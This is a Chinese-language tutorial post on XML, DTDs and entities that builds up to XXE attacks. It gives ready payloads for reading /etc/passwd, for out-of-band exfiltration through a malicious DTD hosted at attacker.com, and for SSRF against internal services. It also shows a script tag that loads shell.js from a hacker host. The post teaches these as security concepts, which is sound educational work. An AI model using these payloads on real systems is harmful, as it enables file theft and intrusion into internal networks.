文章目录
前言
假如没有学过完整的Web前后端开发,可能理解XXE会有点困难。究其原因,是因为我们知识的广度不够,接受新概念时觉得抽象难懂。我们常说代码/软件 定义一切,正是软件提供了一个简易的平台让我们使用计算机,屏蔽了底层复杂的逻辑,与此同时,也引入了一些新的抽象概念。递归的去理解这些概念,什么、哪里才是我们的边界/基线呢?就是一门编程语言。
编程语言写出一个程序,允许我们实现某个功能。而程序在实现这个功能时,为了方便我们使用,又会引入一些新的抽象概念,用户根据这些概念和规范,输入数据,得到输出。即输入特定格式的数据(文本/字符串、二进制),软件读取,处理输出。
1. XML
1.1 HTML文档
我们先说HTML文档。其本质是一个文本文件,浏览器会读入文件,逐行解析文本,根据程序(浏览器)的预定义处理逻辑输出(展示文本内容)。为什么<h1>一级标题</h1>
会被显示得很大呢,正是因为浏览器软件里面已经预定义了<h1></h1>
这个字符串,处理这个标签里面得内容时会把解释为“一级标题”。
我们不仅可以使用标签来定义文档的结构,还可以在HTML文档中使用标签来引入CSS、JavaScript文件,浏览器会根据不同的标签元素进行不同的处理。
1.2 XML
XML(可扩展标记语言,eXtensible Markup Language),既然是语言,代表我们也可以写一段符合其语法的文本,交由程序(解释器/解析器)处理,比如:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE bookstore [
<!ELEMENT bookstore (book+)>
<!ELEMENT book (title, author, price)>
<!ELEMENT title (#PCDATA)>
<!ELEMENT author (#PCDATA)>
<!ELEMENT price (#PCDATA)>
<!ATTLIST book category CDATA "默认分类">
]>
<bookstore>
<book category="技术">
<title>XML入门指南</title>
<author>张三</author>
<price currency="CNY">99.00</price>
</book>
</bookstore>
<!DOCTYPE 根元素 [……]>
中的内容叫DTD(Document Type Define),类似HTML中浏览器解析<script src="http://www.hacker.com/shell.js"></script>
,可以将Js代码写在标签体内,也可以将src属性中的资源加载进来交给Js引擎执行;DTD内容可以直接写在XML中(比如上述例子),也可以使用<!DOCTYPE 根元素 SYSTEM "文件路径/URL>"
,将路径/URL中的DTD文件引入该XML文件中。至于什么是DTD,它和XML文件有什么关系,可以去b站看下XML相关教程或者问一下deepseek。
DTD文件中可以定义“实体”,或者可以说是变量,本质上是定义一个可复用的数据块,也就是说用一个字符串名称指定一个资源,实体可分为2种类型,通用实体和参数实体,两者可在文件中定义,也可引用外部数据资源,其语法格式如下:
<!-- 通用实体:在XML文件中引用,引用格式:&实体名; -->
<!ENTITY 实体名 "实体值"> <!-- 内部实体 -->
<!ENTITY 实体名 SYSTEM "文件/URL"> <!-- 外部实体 -->
<!-- 参数实体:DTD文件自身使用 ,引用格式:%实体名; -->
<!ENTITY % 实体名 "实体值"> <!-- 内部实体 -->
<!ENTITY % 实体名 SYSTEM "文件/URL"> <!-- 外部实体 -->
2. XXE
2.1 原理
XXE(XML External Entity)漏洞的本质是利用 XML 解析器对外部实体的加载功能,通过构造恶意实体实现攻击。其攻击路径可分为两类:
2.2 直接外部实体引用(经典 XXE)
示例:直接读取服务器本地文件
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>
- 攻击结果:若服务器返回 &xxe; 的内容,则 /etc/passwd 文件被泄露。
- 防御:禁用外部实体(如设置 disallow-doctype-decl)。
2.3 恶意 DTD 文件攻击(进阶 XXE)
当直接外部实体被禁用时,攻击者可能通过 引用外部 DTD 文件中的参数实体 绕过限制。
攻击步骤
- 构造恶意 DTD 文件
托管在攻击者服务器(http://attacker.com/malicious.dtd):
<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param "<!ENTITY % exfil SYSTEM 'http://attacker.com/?data=%payload;'>">
%param;
%exfil;
- 解析逻辑:
%
,字符引用,0x25代表Unicode编码中的%
% payload
读取 /etc/passwd。% param
定义嵌套实体 %exfil,将数据外传到攻击者服务器。% exfil;
触发 HTTP 请求。
- 诱导服务器解析恶意 XML
<!DOCTYPE data SYSTEM "http://attacker.com/malicious.dtd">
<data>123</data>
- 结果:服务器解析时加载外部 DTD,执行参数实体攻击链,导致数据外泄。
为何更危险?
- 绕过防御:部分解析器仅禁用通用实体(&xxe;),但允许参数实体(%param;)。
- 隐蔽性:数据通过带外(Out-of-Band)传输,无回显也能窃取信息。
2.4 SSRF
无论是直接外部实体还是恶意 DTD,只要 XML 解析器发起 未经授权的网络请求,均可能导致 SSRF。例如:
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "http://内网IP:8080/admin">
]>
<data>&xxe;</data>
结果:服务器向内部服务http://内网IP:8080/admin
发起请求,攻击者可探测或攻击内网系统。
3. 总结
说了这么多,无非就是Web应用前后端通信使用XML格式的字符串,后端语言会解析接收到的XML文本提取数据。我们通过构造一个恶意的XML,利用 XML 解析器对外部实体的加载功能进行攻击。
参考
[1] XML教程
[2] W3school DTD教程
[3] 小迪安全v2023
[4] deepseek